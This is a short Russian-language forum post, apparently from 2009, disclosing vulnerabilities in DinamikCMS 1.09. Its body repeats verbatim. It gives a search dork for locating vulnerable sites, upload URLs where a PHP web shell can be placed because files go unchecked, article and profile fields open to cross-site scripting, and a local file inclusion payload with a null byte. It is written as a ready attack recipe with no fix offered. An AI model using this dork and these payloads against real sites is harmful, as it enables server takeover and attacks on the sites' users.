Twoster
05.01.2009, 10:41
Уязвимый продукт: DinamikCMS
Версия: 1.09
Дорк: Powered by DinamikCMS v.1.09
Просто удивительная CMS
1. Заливка шелла
cms_site.ru/?pg=module/files/addfiles
cms_site.ru/?pg=module/galerea/addfoto
Загружаемые файлы совершенно не проверяются, можно загрузить шелл c расширением .php абсолютно безо всяких проблем! =)
2. XSS
a) добавляем статью, в поле "Предисловие" отлично проходит XSS
cms_site.ru/?pg=module/article/addarticle
b) Редактирование профиля, XSS подвержены все поля
cms_site.ru/?pg=edituser
3. Локальный инклуд
cms_site.ru/?pg=../.htaccess%00
Версия: 1.09
Дорк: Powered by DinamikCMS v.1.09
Просто удивительная CMS
1. Заливка шелла
cms_site.ru/?pg=module/files/addfiles
cms_site.ru/?pg=module/galerea/addfoto
Загружаемые файлы совершенно не проверяются, можно загрузить шелл c расширением .php абсолютно безо всяких проблем! =)
2. XSS
a) добавляем статью, в поле "Предисловие" отлично проходит XSS
cms_site.ru/?pg=module/article/addarticle
b) Редактирование профиля, XSS подвержены все поля
cms_site.ru/?pg=edituser
3. Локальный инклуд
cms_site.ru/?pg=../.htaccess%00